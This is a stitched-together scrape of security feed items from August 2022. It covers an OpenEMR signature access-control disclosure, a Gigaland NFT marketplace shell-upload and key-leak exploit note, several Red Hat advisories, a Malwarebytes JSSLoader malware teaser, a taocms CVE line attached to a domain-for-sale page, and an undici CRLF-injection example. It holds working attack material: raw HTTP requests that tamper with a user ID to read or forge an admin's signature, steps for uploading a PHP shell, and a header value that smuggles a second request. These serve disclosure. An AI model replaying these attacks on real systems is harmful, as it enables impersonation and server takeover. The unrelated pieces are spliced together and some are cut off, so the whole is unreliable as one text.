Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.

**Description**

I observed that users can view any user's signature by changing their user parameter to other's user parameter. By the same way users can create/delete/update other's signature in create signature function.

**View/Get other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  Use Current "  to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send request, you will see the signature of admin is sent in response.
    

**Create/Update/Delete other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  {Sign your signature} > Sign and Save "  to create your own signature. Intercept this request with Burpsuite. 
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send this request.
    5. Login with admin account. You will see admin's signature was created.
    

**Proof of Concept****View/Get other's signature:**

    POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 61
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
    

**Create/Update/Delete other's signature:**

    POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 39622
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Content-Type: application/json
    Accept: */*
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
    

**Impact**

Attacker can get/create/update any user's signature including admin's signature. As a result, he/she can impersonate admin or anyone to perform actions.

**Occurrences**

CVE-2022-2824: User can do all actives with  other's signature (view, get, create, update, delete,...) in openemr

Gigaland NFT Marketplace version 1.9 suffers from remote shell upload and ETH private key disclosure vulnerabilities.

    # Exploit Title: Gigaland NFT marketplace Shell upload and ETH private key leak # Google Dork: N/A# Date: 14/8/2022# Exploit Author: Sohel Yousef   https://www.linkedin.com/in/sohel-yousef-50a905189/# Software Link: https://gigaland.io/# Version: 1.9# Category: webapps1. Sell Upload after connectiong your wallet to the site go to edit profile section on the linklocalhost/artist/accountupload your shell in php format with no secuirty your shell well be in this directionstorage/artist/profile/ ++ you can Inspect Element the edit profile page to have the direct link 2. Private key leak this link localhost//resources/privateJs/transfer.jshave the private key for the ethereum account const addressFrom = receiverAddress;const privKey = '9f09d101c +++  HIDDEN ++++++ ac7bea0db0c25d2b5a3'async function transfer(addressto, data, history_id) {    debugger;    const web3js = new Web3(rpcURL);    const contract = new web3js.eth.Contract(trabi, trcontractAddress, {});    const nonce = await web3js.eth.getTransactionCount(addressFrom, 'latest'); //get latest nonce

Gigaland NFT Marketplace 1.9 Shell Upload / Key Disclosure

Red Hat Security Advisory 2022-6061-01 - The etcd packages provide a highly available key-value store for shared configuration. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.2 (etcd) security update  
Advisory ID:       RHSA-2022:6061-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6061  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-21698 CVE-2022-30631  
====================================================================  
1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform 16.2  
(Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.2 - ppc64le, x86_64

3. Description:

The etcd packages provide a highly available key-value store for shared  
configuration.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.2:

Source:  
etcd-3.3.23-10.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-10.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-10.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-10.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-10.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo20tzjgjWX9erEAQiX3w/7BqJylR0wjzoTZyhtzLAo5EtOYCcoBmzH  
IhBuvxUmBgM8IvnqedPBGa17v5+7OsZvJKUqkZjfnIL9MFdrYSiaqHR1T4mS0Qsu  
Q830AYyFU2sTSa22AmR03Xhfr4e3WXi+gYnR9dPqxuRvr2gaVMZ0R150kQSr+ez1  
ZQ+58lv2krhnUZK1qznyxDRUSauRqRgQvjNjhVipA5q3mCDu0FuJkyEa+65MIyP7  
4yTXRspx4Uk2fCIhm+RNRJPZTIG2t9vuX1tjozsoi3x6yiYGTMKh+OBGB2w8QIig  
IOPZDlcbqh9/XZhpWo0sYLeBqHepOX3KE46q/40BhsjbOoKOdm7A4P81zxjNJ1lU  
BbsKSEjeVQtEXAmLM1j0RNxAMYBfJJWS1Cu4mB3/M6kI2+gB6BzoPiPiZDt/5QU0  
loujArrUdeEnWNy65JJ9fVhKNf7iJ5NAf8GHE9AEPmwQSXSIuf5g5z8N1zHGF/7x  
O/uuHfx5XEBLkjMEpkSatxZ/RgMOvbKOQRMGuFMq621BOFsjsh7hyzeo3LJC5e1z  
75j5cXzd0VVLsr19HrB7HoinAQZvFALf5Qw0Uqd1Abcr+wPaN32NPjb+WNMU987/  
1bocpSrFlbcycLN7CH1AfVR6XdNSctdzAbGv2AwLcuqsro5e5QEEPZSI1/yMLc9B  
KZvTwvCKViQÔ+p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6061-01

Red Hat Security Advisory 2022-6065-01 - Collectd plugin for gathering resource usage statistics from containers created with the libpod library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.1 (collectd-libpod-stats) security update  
Advisory ID:       RHSA-2022:6065-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6065  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-30631  
====================================================================  
1. Summary:

An update for collectd-libpod-stats is now available for Red Hat OpenStack  
Platform 16.1 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64

3. Description:

Collectd plugin for gathering resource usage statistics from containers  
created with the libpod library.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
collectd-libpod-stats-1.0.4-2.el8ost.src.rpm

ppc64le:  
collectd-libpod-stats-1.0.4-2.el8ost.ppc64le.rpm

x86_64:  
collectd-libpod-stats-1.0.4-2.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo28dzjgjWX9erEAQiJIw//dp8mPmJul3+Vqcelyz+HrEFJwYPSfefl  
3mr8VZqvtPdbufEe6L1kgpdQ3aOx8iYOHa7mXUA+NXSYUsZ9IquX5gLtF+9yaVcr  
qxyUiYkbokbQv1kDu39bRK3dKp0OquIAErw0FHLGap8D9br9EuJ6BZSleb/eP31A  
84GA8uQ+N7VQhrMY/XYwaNmJrLXrnT/nzxYSQIThEE1jDllZW8QpbS8ck1IgP+8Q  
yLPA9pMh2zkl3y0ovYDaZDUZTIrOT6gnRjnN0g4cY/50dYSKezwOfSrjO0mjvbvD  
ln+EXKal4MaxZxjSSO+YxoKOL3DZNj/BLyv38zw3n7HOjneApyZS+npNHRWLFZVr  
sR/0x1cT+xqNl04df70EJSECl7oPXodAcpopMgTzokDwOgpPsJlmvF2M0LSNL/NL  
O4Lx+1d329Fp3OCUCjXXl0pmspXCq7Bo1qjCh4KTdC1AdM+zhGPIFACEPczbqwz7  
NSrhI78OgHcuIq4JPmQMjB+WKRaKngwK7pv9kSysoKAIsvJyi6xzzlOJBUyUsquZ  
73427OdulFyPBLFi5sIXNiI8m9lAxxAG+SNAIF3LmQYgU+rpeaminRsiviWh9y7x  
ktR/vfTMjWzFJVsZ62+0XehI4CZynWRdtSWBD+C7rXTzoMrJR6loB1rJHGIu1CS0  
EuBqabZ4KYM=dw2O  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6065-01

Red Hat Security Advisory 2022-6062-01 - Collectd plugin for gathering resource usage statistics from containers created with the libpod library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.2 (collectd-libpod-stats) security update  
Advisory ID:       RHSA-2022:6062-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6062  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-30631  
====================================================================  
1. Summary:

An update for collectd-libpod-stats is now available for Red Hat OpenStack  
Platform 16.2 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.2 - ppc64le, x86_64

3. Description:

Collectd plugin for gathering resource usage statistics from containers  
created with the libpod library.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.2:

Source:  
collectd-libpod-stats-1.0.4-2.el8ost.src.rpm

ppc64le:  
collectd-libpod-stats-1.0.4-2.el8ost.ppc64le.rpm

x86_64:  
collectd-libpod-stats-1.0.4-2.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo2+9zjgjWX9erEAQifBQ/9FNIwjzEhXZMoULDnpPWA5iiRmfdmd6s9  
WVmP2w6qY4rrKF7hSItPz0IxzXBTOklId42E12nF3zIArzTqKKOag0oOIeiAXvdZ  
QOcX/KOFQC9jF7iBxU4J0uYk8wfUqxOCCITLKojHEt8pCOpH6aiGTPFM9ZpFS9HF  
mmF4YJUB9/1XtsjQKuqCPQHrFZHWtJUW8TBt48374F2WvC4QzCVFxfJx05d6SGvD  
NWyMFyI3ciyGMflGe6DZiFjPlqY0idfhaTobNS+6v73mLfPLAARtZyEqezxFawyi  
oR/vF4/Mcv2wcYXfM+YX5VXVawgN+Xqw8OAIbujUcEXhhK/cEYHhm5SlYEP0l7xS  
/OvZ+BZOZ1W2cHBxRgME6RCbdYQ8z0ZEMEmMHVGuJzd/t0OX6nSYfx9GeuIQe8gr  
UMCLtDNZJ06fLgr0bdJ2x8EeY+ulJWLco5F+Y/f4Jq5dX3Aj+zJE9MdVOJI768N1  
BkHE0OaFklYprz4ZZu3RrIRK7OIurDpICDK/K8E/WHp08bcIfwLJdE/Wi0PHH7M/  
LTAoLwPBGlP+zqQE2dPlaBp0lEDePm+w4gYVO9vfwa0jsU7UQ0dH/ptePcPhUO4a  
5Rn6creMaKbQrLKZYjhRBzg4E2vAPjaqfEc7NftSZvn4B8pfX1pVEUxbn9ZsWSBZ  
hPFw3Kwo1GY=EOoO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6062-01

Red Hat Security Advisory 2022-6066-01 - The etcd packages provide a highly available key-value store for shared configuration. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.1 (etcd) security update  
Advisory ID:       RHSA-2022:6066-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6066  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-21698 CVE-2022-30631  
====================================================================  
1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform 16.1  
(Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64

3. Description:

The etcd packages provide a highly available key-value store for shared  
configuration.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
etcd-3.3.23-10.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-10.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-10.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-10.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-10.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo23NzjgjWX9erEAQhJ9w//RBbgT6wIwGU09lyTf4OIK5aYeDodCA1W  
FJSxMuBJYrCQx0esUTlqBruCVuqe4YgGjJ/9HgzkRCPbEIXGclYFz6/1FkZCOTmu  
OvT2km1xSCs+EggHOJQ6fJIhpqF1qll1/W2zAEmd0k4AxBRuWRVGIwqkKw6G9Ep6  
Qs7g0/mni1xqIe+sX2Pw2stZCGxb1GZ1x5kXrVfAO/Hp2/6HxEun4jBKuLJ9bneb  
PHsS3QzBARhUHE7Yd+UQ8awbQFXK5Hm/vx/aF3nTzgDy5fWTMh6K6+N059TE1Vdw  
HdqjiSleqWpN4cKmu1xFOvjXSfoSgbJ5KmFNQR3LSj+v+sQSyYItdqjHo8u4pO8D  
rcj1MC30M3IcMBahmEiEZIpaImfERCAM0muGzQON9d1FRiND5WQW8tLBMLRcLXLF  
0MA0xFaayNZknGINoVyxoC5LwUcW8wrNkaZEADVtW9N4DwHzGAtlq6pGUNJbMRKk  
pGX55k4jDNCcpC3fZwDmLDo68Yx6mKE1AGimgn1kp4+CDfy0CqzIzw+ASzv3yFLh  
LXgBZXURM57xjIGw86GqvKzrvFwogJx4PNLXG7mBbyloC5ftn0LOCtUnT6ufvYnc  
aqgbgVExdWjP8WKfHB3z1KCkQOrih4/QOZskQRfdqJLjmkjopv4mLjDxE7vhCO+a  
buMc0LrYxag=rjcs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6066-01

Red Hat Security Advisory 2022-6057-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 3.1.422 and .NET Runtime 3.1.28.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET Core 3.1 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6057-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6057  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-34716  
====================================================================  
1. Summary:

An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 3.1.422 and .NET Runtime  
3.1.28.

Security Fix(es):

* dotnet: External Entity Injection during XML signature verification  
(CVE-2022-34716)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2115183 - CVE-2022-34716 dotnet: External Entity Injection during XML signature verification

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet3.1-3.1.422-1.el8_6.src.rpm

x86_64:  
aspnetcore-runtime-3.1-3.1.28-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-hostfxr-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-hostfxr-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-runtime-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-runtime-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-3.1.422-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-templates-3.1-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debugsource-3.1.422-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

x86_64:  
dotnet-apphost-pack-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-hostfxr-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-runtime-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-source-built-artifacts-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debugsource-3.1.422-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-34716  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo3BdzjgjWX9erEAQiqDA//ZkYPeqalj7sdjnZ3/0Ke/t/4LCdqTiGM  
SAkYITxvUUavido2T9woQPs9b8WQEwTCkfj1nELZMUV+WQcumGAj9ecghAgD/uLj  
jOIL+IueInXQdaEvd5yYEZJstkmcM2kcrBsfk4yqnQmBxAPu+bLMWDknvekd2RHl  
jeONmL+6GSErtoaTd6P3gaX0zF3m9NtQLckXR71eAs2G5P4NYYMKAyLIq7H7gmfY  
rc7lzxIng6kmt6UYFEwGvFwzHyTWs8PurJGHdC1CYQsH3HlbRqhGBAnTVVt3wvPo  
j/IrIQ6tBakjNMzCe3sdmwwX8/j0U6z47S9ibrfSbh+zNo4PS06B3dPJolLshrWP  
ORxUhrx/7ctgE0shUERIxhLG+qhnr5KEh/wdP3TJkKcgcm9B3QIlFlfNq/i4twwK  
M4GD/WjY8N4+q/uB4veyTmGM0njmYDrbkEDRn3HLtGlMjyROQIN0F5bt1DLJDxRr  
DkVxT0oyZRrUULGMTRj0TmQ53wpeO06/w27sLcSEmrnOW86JnIZ01zMQvUR2vGl+  
wQAWiU43Bj0K1ULrJootfQWT1UdIQyBATufGt2SIHfuCCO9f9FJ1fQOgvZYHH8Ai  
zh4BdCojW/AzTW+wflHvujpqkZc+JgKmjnfLV2zSm7Cpv8BHegvC+cE+kjwxvyHQ  
XQKOcicCSUE=eurD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6057-01

In this deep dive analysis, we look at the latest version of the JSSLoader malware tied to the FIN7 group.



(Read more...)




The post JSSLoader: the shellcode edition appeared first on Malwarebytes Labs.

The Malwarebytes Threat Intelligence team observed a malspam campaign in late June that we attribute to the FIN7 APT group. One of the samples was also reported on Twitter by Josh Trombley; during execution, it was observed to drop a secondary payload, written in .NET.

Details about FIN7 campaigns were described by Mandiant in the article "FIN7 Power Hour: Adversary Archeology and the Evolution of FIN7". Earlier this year Morphisec and Secureworks described a new component used by this group, delivered in XLL format. That element was the first step in the attack chain leading to another malware, dubbed JSSLoader. 

During our analysis, we found out that the current malware used by FIN7 is yet another rewrite of JSSLoader with expanded capabilities as well as new functions that include data exfiltration.

In this white paper, we will focus on the implementation details of the new observed sample, and provide a deep dive in the code, as well as compare it with earlier samples analyzed by other vendors.

**Download the white paper.**

JSSLoader: the shellcode edition

An issue was discovered in taocms 3.0.2. in the website settings that allows arbitrary php code to be injected by modifying config.php.

This domain is for sale: $5,895

Buy now for $5,895 or pay $245.63 per month for 24 months

This domain is for sale: $5,895

*   Enjoy zero percent financing
    
*   Quick delivery of the domain
    
*   Safe and secure shopping
    

**Since 2005, we've helped thousands of people get the perfect domain name**

The purchase of the domain was easy and straight forward. Then, after a year and we accidentally lost our domain, HugeDomains was accommodating and helpful in us regaining our domain. I will definitely continue using them for my domain selling and purchasing. Best,

\- Jose Delacruz, July 19, 2022

The financing was very helpful - Thanks!

\- Steve Foose, July 18, 2022

I was very happy with the responsiveness and professionalism of the HugeDomains team. They are honest, straightforward and deliver what they promise. While I hope I don't have to purchase a premium domain again, I will be happy to work with HugeDomains if I have to purchase another.

\- Dorian Dickinson, July 14, 2022

Superfast purchase and the transfer was smooth.

\- Kajsa Fredriksson, July 13, 2022

Fast, smooth, and a great value. What more could you ask for?

\- Christopher Vanderhorst, July 11, 2022

See more testimonials

**Customer success stories**

Read inspiring stories about people who found great domains.

We found a name that is unique, captures everything related to improvement and promotes a sense of being better.

**Our promise to you**

**30-day money back guarantee**

HugeDomains provides a 100% satisfaction guarantee on every domain name that we sell through our website. If you buy a domain and are unhappy with it, we will accept the return within 30 days and issue a full refund – no questions asked.

**Quick delivery of the domain**

In most cases access to the domain will be available within one to two hours of purchase, however access to domains purchased after business hours will be available within the next business day.

**Safe and secure shopping**

Your online safety and security is our top priority. We understand the importance of protecting your personal information.

We protect your information through SSL encryption technology, providing the safest, most secure shopping experience possible. Additionally, you may checkout with PayPal or Escrow.com.

Yes, you can transfer your domain to any registrar or hosting company once you have purchased it. Since domain transfers are a manual process, it can take up to 5 days to transfer the domain.

Domains purchased with payment plans are not eligible to transfer until all payments have been made. Please remember that our 30-day money back guarantee is void once a domain has been transferred.

For transfer instructions to GoDaddy, please click here.

Once you purchase the domain we will push it into an account for you at our registrar, NameBright.com, we will then send you an email with your NameBright username and password. In most cases access to the domain will be available within one to two hours of purchase, however access to domains purchased after business hours will be available within the next business day.

Nothing else is included with the purchase of the domain name. Our registrar NameBright.com does offer email packages for a yearly fee, however you will need to find hosting and web design services on your own.

Yes we offer payment plans for up to 12 months. See details.

If you wish the domain ownership information to be private, add WhoIs Privacy Protection to your domain. This hides your personal information from the general public.

To add privacy protection to your domain, do so within your registrar account. NameBright offers WhoIs Privacy Protection for free for the first year, and then for a small fee for subsequent years.

Whois information is not updated immediately. It typically takes several hours for Whois data to update, and different registrars are faster than others. Usually your Whois information will be fully updated within two days.

Your Web address means everything – watch our video see why

Your Web address means everything  
watch our video see why

**Other domains you might like**

**Quick stats**

Domain length

6 characters

CVE-2022-36262: Taocms.com is for sale | HugeDomains

undici is an HTTP/1.1 client, written from scratch for Node.js.`=< undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header. Example: ``` import { request } from 'undici' const unsanitizedContentTypeInput = 'application/json\r\n\r\nGET /foo2 HTTP/1.1' await request('http://localhost:3000, { method: 'GET', headers: { 'content-type': unsanitizedContentTypeInput }, }) ``` The above snippet will perform two requests in a single `request` API call: 1) `http://localhost:3000/` 2) `http://localhost:3000/foo2` This issue was patched in Undici v5.8.1. Sanitize input when sending content-type headers using user input as a workaround.

**Impact**

=< undici@5.8.0 users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the content-type header.

Example:

